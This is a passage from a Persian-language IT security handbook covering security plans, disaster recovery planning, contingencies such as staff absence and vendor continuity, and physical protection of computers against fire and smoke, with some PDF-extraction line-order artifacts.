‫ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﺑﺎﻳﺪ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺭﺯﺵ ﺁﻧﻬﺎ‪ ،‬ﻧﻘﺎﻃﻲ ﻛﻪ ﺍﻳﻦ ﺍﻗﻼﻡ ﺩﺭ ﺁﻥ ﻣﺴﺘﻘﺮ ﻫـﺴﺘﻨﺪ‪ ،‬ﺗﻬﺪﻳـﺪﻫﺎﻱ‬
‫ﺍﺣﺘﻤﺎﻟﻲ ﻛﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺭﺍ ﺗﻮﺻﻴﻒ ﻛﻨﺪ‪ .‬ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺍﻗﻼﻡ‬
‫ﺳﺮﻣﺎﻳﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻓﻀﺎﻱ ﻣﺤﻴﻄﻲ ﺍﻣﻨﻴﺖ ‪ -‬ﺣﺪ ﻭ ﻣﺮﺯ ﻣﻴﺎﻥ ﺳﺎﻳﺮ ﻗﺴﻤﺘﻬﺎﻱ ﺟﻬﺎﻥ ﻭ ﻧﺎﺣﻴﺔ ﺍﻣﻦ ﺷـﻤﺎ ‪ -‬ﻭ‬
‫ﻫﺮ ﺣﻔﺮﻩ ﺩﺭ ﻓﻀﺎﻱ ﻣﺤﻴﻄﻲ‪ ،‬ﻫﻤﺮﺍﻩ ﺑﺎ ﺷﻴﻮﻩﻫﺎﻱ ﺩﻓﺎﻋﻲ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﻣﻘﺎﻭﻡﺳﺎﺯﻱ ﺁﻧﻬﺎ‪ ،‬ﻭ ﻫﺰﻳﻨﺔ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﻴﺪ‪.‬‬
‫ﻼ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻪ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﺍﮔﺮ ﺗﺄﺳﻴﺴﺎﺕ ﺣﻴﺎﺗﻲ ﺧﺎﺻﻲ ﺭﺍ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﻪ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻭ ﻣﺜ ﹰ‬
‫ﺑﻴﺮﻭﻧﻲ ﻛﻪ ﺗﺨﺼﺼﺶ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﺳﺖ ﺑﺪﻫﻴﺪ‪ .‬ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﻳـﻚ ﻣـﺪﺭﻙ ﺣـﺴﺎﺱ ﺑـﺸﻤﺎﺭ‬
‫ﺁﻭﺭﻳﺪ؛ ﭼﺮﺍﮐﻪ ﺍﻳﻦ ﻃﺮﺡ ﻃﺒﻖ ﻃﺒﻴﻌﺖ ﺫﺍﺗﻲ‪ ،‬ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺮﻭﺡ ﺩﺭ ﻣﻮﺭﺩ ﺿﻌﻴﻒﺗﺮﻳﻦ ﻧﻘﺎﻁ ﺩﻓﺎﻋﻲ ﺷﻤﺎ ﺍﺳﺖ‪.‬‬
‫ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ‬
‫ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻓﻮﺭﻱ ﻭ ﻣﻮﻗﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺳﺮﻗﺖ ﻳﺎ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺳﻮﻡ ﺑﻪ ﻃﺮﺡ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ‪ ٥٤‬ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ‬
‫ﺍﺟﺰﺍﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﮐﻪ ﺣﺘﻲ ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳﮏ ﭘﺎﻳﮕﺎﻩ ﺳﺎﻧﺤﻪﺩﻳـﺪﻩ ﻣـﺸﻐﻮﻝ ﺑـﻪ ﮐـﺎﺭ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻚ ﺳﺎﻧﺤﻪ ﺗﺮﻣﻴﻢ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﻳﺪﻩﺁﻝ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﺻﻮﻝ ﺍﻳﻤﻨﻲ ﻫﻤﭽﻨﺎﻥ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺎ ﺍﺟﺎﺭﻩ ﻛﺮﺩﻥ ﻳﺎ ﻗﺮﺽ ﮔﺮﻓﺘﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻨﺎﻭﺏ ﻛﻤﺘﺮ ﺗﻤﺎﻡ ﺑﺮﻧﺎﻣﺔ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﺴﻬﻴﻼﺕ ﺟﺎﻳﮕﺰﻳﻦ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﻫﺴﺘﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺩﺭﺳﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺳﺎﻳﺮ ﺍﺣﺘﻤﺎﻻﺕ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻗﻼﻣﻲ ﻛﻪ ﺫﻛﺮ ﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺄﺛﻴﺮ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺩ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪:‬‬
‫ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ‬
‫ﻗﻄﻊ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻭ ﺍﺗﺼﺎﻻﺕ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﺷﻤﺎ ﭼﻪ ﺗﺄﺛﻴﺮﻱ ﻣﻲﮔﺬﺍﺭﺩ؟‬
‫ﺗﺪﺍﻭﻡ ﻛﺎﺭ ﻓﺮﻭﺷﻨﺪﻩ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﭼﻘﺪﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ؟ ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺷﻐﻞ ﺩﻫﺪ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﻫﺪ ﻛﻪ ﺷﻤﺎ ﻧﺨﻮﺍﻫﻴﺪ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺁﻥ ﻭﻓﻖ ﺩﻫﻴﺪ‪ ،‬ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﺷﻮﻳﺪ؟‬
‫‪Disaster Recovery Plan‬‬
‫‪54‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٢٨١‬‬
‫ﻏﻴﺒﺖ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ‬
‫ﺁﻳﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ؟‬
‫ﻓﻮﺕ‪ ،‬ﻣﻌﻠﻮﻟﻴﺖ‪ ،‬ﻳﺎ ﻋﺰﻝ ﻳﻚ ﻋﻀﻮ ﻛﻠﻴﺪﻱ ﺳﺎﺯﻣﺎﻥ‬
‫ﺁﻳﺎ ﻫﺮ ﻋﻀﻮ ﺳﺎﺯﻣﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎﻳﮕﺰﻳﻦ ﺷﻮﺩ؟ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﭼﻴﺴﺘﻨﺪ؟‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺷـﻤﺎ ﺩﺭ ﮔـﺴﺘﺮﺓ ﺳـﺎﺯﻣﺎﻧﻲ ﺑﺎﺷـﻨﺪ‪ .‬ﺣﻔـﻆ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ ،‬ﻭﻟﻲ ﻭﻗﺘﻲ ﻓﻀﺎ‪ ،‬ﻗﺪﺭﺕ‪ ،‬ﻳﺎ ﺍﺑﺰﺍﺭ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﻋﻤﻠﻜﺮﺩ ﻧﺒﺎﺷﺪ ﻛﻤﺘﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ‬
‫ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻫﻤﺎﻥ ﻣﺴﺎﺋﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮﺩﺍﺭﺩ ﻛﻪ ﻫﻨﮕﺎﻡ ﺣﻔﺎﻇﺖ ﻣﺎﺷـﻴﻦ ﺗﺤﺮﻳـﺮ‪ ،‬ﺯﻳـﻮﺭﺁﻻﺕ ﻳـﺎ ﻛـﺸﻮﻫﺎﻱ ﭘـﺮ ﺍﺯ‬
‫ﭘﺮﻭﻧﺪﻩ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻳﻢ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻣﺎﺷﻴﻦ ﺗﺤﺮﻳﺮ ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪ ،‬ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻓﺘﺮﻱ ﻭﺳﻴﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺍﻓﺮﺍﺩ ﺩﻓﺘﺮ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺯﻳﻮﺭﺁﻻﺕ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﺍﺭﺯﺵ ﻫﺴﺘﻨﺪ ﻭ ﺑﻄﻮﺭ ﻛﻠﻲ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺭﻕ ﺁﺳـﺎﻥ‬
‫ﺍﺳﺖ‪ .‬ﻣﺎﻧﻨﺪ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺪﺍﺭﻙ ﻣﺎﻟﻲ‪ ،‬ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﺎ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻫﻤﺮﺍﻩ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘـﻪ ﻳـﺎ‬
‫ﺧﺮﺍﺏ ﺷﺪﻩ ﺑﺎﺷﺪ ‪ -‬ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩﺍﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻫـﻢ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‬
‫ﻫﻤﭽﻨﺎﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺮﭘﺎﻳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺟﺎﻳﮕﺰﻳﻦ ﺯﻣﺎﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺭﺍ ﺻﺮﻑ ﻛﻨﻴﺪ‪ .‬ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ‪ ،‬ﻳﺎ ﺗﻨﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﻫﻤﻴﻦ ﻧﻜﺘﻪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ‪ ،‬ﻋﻠﻴﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻣﺤـﻴﻂ ﺧـﻮﺩ ﻫـﺴﺘﻨﺪ‪ .‬ﻳـﻚ ﻣﻨﺒـﻊ‬
‫ﺗﻐﺬﻳﺔ ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪ ﺍﮔﺮ ﺑﻪ ﺑﺮﻕ ﻭﺻﻞ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﺻﺎﻋﻘﻪﺍﻱ ﺭﺥ ﺩﻫﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﺣﺘﻲ ﺑﺴﻮﺯﺩ‪.‬‬
‫ﺗﺪﺍﺑﻴﺮ ﻣﺨﺘﻠﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺗﺨﺎﺫ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ‬
‫ﺭﺍﻩﺣﻠﻬﺎ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺍﺯ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‪ ،‬ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ‪ ،‬ﻭ ﺍﺧﻼﻝﮔﺮﺍﻥ ﺩﺭﻭﻧﻲ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺤﻴﻄﻲ‬
‫ﺁﺗﺶ‬
‫ﻻ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺗﺶ ﺑﺴﻴﺎﺭ ﻛﻢ ﺩﻭﺍﻡ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺯ ﺍﻳﻦ ﻗﺎﻋـﺪﻩ ﻣـﺴﺘﺜﻨﻲ ﺑﺎﺷـﺪ ﺍﺯ ﻭﺟـﻮﺩ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺗﺶﻧﺸﺎﻧﻲ ﺧﻮﺏ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺨﻠﻴـﺔ‬
‫ﺍﺗﻮﻣﺎﺗﻴﻚ ﮔﺎﺯ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻫﺮ ﻛﺪﺍﻡ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺒﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺩﻗﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺳﻴﻢﻛﺸﻲﻫﺎ ﻫﻢ ﻣﺤﻔﺎﻇﺖ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎﻱ ﺩﻭﺩ ﻭ ﻛﻼﻫﻜﻬـﺎﻱ‬
‫ﺁﺑﭙﺎﺷﻬﺎﻱ ﻗﻄﺮﻩﺍﻱ ‪ -‬ﺍﮔﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ ‪ -‬ﻃﻮﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺳﻴﻤﻬﺎﻱ ﺩﺭﻭﻥ ﺳﻴﻨﻲﻫﺎﻱ ﻛﺎﺑﻞ )ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎﻱ ﻛﺎﺫﺏ( ﻭ‬
‫ﻧﻴﺰ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻛﺎﺑﻞ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻼ ﻣﺘﻌﺎﺩﻟﻲ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻪ ﻫﻢ ﺧﻮﺭﺩﻥ ﺍﻳﻦ ﺗﻌﺎﺩﻝ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻻ ﺑﺮﺍﻱ ﺻﺤﻴﺢ ﻛﺎﺭ ﻛﺮﺩﻥ ﺑﻪ ﺷﺮﺍﻳﻂ ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﺤﻴﻂ ﻛﺎﻣ ﹰ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻧﺎﺧﻮﺷﺎﻳﻨﺪ ﺩﭼﺎﺭ ﺧﺮﺍﺑﻲ ﺷﻮﺩ‪ .‬ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭ ﻧﺎﻣﻨﻈﻢ‬
‫ﺑﺎﻋﺚ ﺁﻥ ﺷﻮﺩ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺗﻲ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﺪ‪ ،‬ﻧﺘﺎﻳﺞ ﻏﻠﻂ ﺗﻮﻟﻴﺪ ﻛﻨﺪ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺭﺍ ﻣﺨﺪﻭﺵ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪٢٨٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﻭﺩ‬
‫ﺩﻭﺩ ﺑﺮﺍﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﺍﺳﺖ‪ .‬ﺩﻭﺩ ﺳﺎﻳﻨﺪﻩﺍﻱ ﻗﻮﻱ ﺍﺳﺖ ﻭ ﺭﻭﻱ ﺷﺎﺧﻜﻬﺎﻱ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﺳـﺮﺑﺎﺯ‪ ،‬ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﻧﻮﺭﻱ ﻭ ﻧﻮﺍﺭ ﮔﺮﺩﺍﻧﻬﺎ ﺟﻤﻊ ﻣﻲﺷﻮﺩ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻭﺩ ﺑﻮﺳﻴﻠﺔ ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ‪ .‬ﺁﺗﺶﺳﻮﺯﻱﻫﺎﻱ ﺑﺮﻗﻲ ‪ -‬ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ‬
‫ﻣﺒﺪﻟﻬﺎﻱ ﻣﺎﻧﻴﺘﻮﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺩﻫﺎﻱ ﺗﻨﺪ ﻭ ﺯﻧﻨﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ ﻭ‬
‫ﻧﻴﺰ ﺳﻤﻲ ﻳﺎ ﺳﺮﻃﺎﻧﺰﺍ ﺑﺎﺷﺪ‪ .‬ﺧﻄﺮ ﻣﻬﻢ ﺩﻳﮕﺮ ﺩﻭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺳﻴﮕﺎﺭﻫﺎ ﻭ ﭘﻴﭗﻫﺎ ﺑﺮ ﻣﻲﺧﻴﺰﺩ‪.‬‬
‫ﺩﺭ ﻫﺮ ﺍﺗﺎﻗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺁﺷﻜﺎﺭﮔﺮ ﺩﻭﺩ‪ ٥٥‬ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺁﺷﻜﺎﺭﮔﺮﻫﺎ ﺩﺭ ﺯﻳﺮ ﻛﻒﻫﺎﻱ ﭘﻠـﻪﺍﻱ‬
